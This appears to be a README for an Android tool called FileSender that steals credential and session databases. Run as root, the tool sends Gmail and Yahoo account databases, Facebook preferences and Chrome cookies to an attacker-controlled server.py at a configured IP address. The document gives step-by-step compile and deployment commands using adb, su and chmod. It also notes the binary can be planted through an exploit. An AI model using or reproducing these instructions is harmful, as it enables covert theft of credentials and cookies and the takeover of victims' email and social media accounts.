This standalone executable should be put on a remote android device and execute
*You must execute the file as root
The file will send accouts.db(which is used by YAHOO's app and Gmail app), prefes_db(which is used by Facebook's app) and Cookies(A db which is used by 
chrome browser on the android device for accessing facebook) to our local machine(or any other file we will specify in the code)
*The standalone executable must be used with server.py

1.  On your local computer run server.py(you can run sever.py -h to view the usage)
2.  Change the ip address in the top defines of the standalone executable: #define IP "[YOUR_IP_ADDRESS]" (you can also feel free to change the port definition)
3.  Compile the code using android-ndk on linux(I will add instructions on how to do that)
4.  Put the compiled file on an android device in 
    If you using adb:
                                -adb push ./FileSender /data/local/tmp
                                -adb shell
                                -su
                                -chmod 777 /data/local/tmp/FileSender
                                -chown root:root /data/local/tmp/FileSende
                                -cd /data/local/tmp/
                                -./FileSender
    If you using exploit you can put it in any folder you like and execute it in high privileges

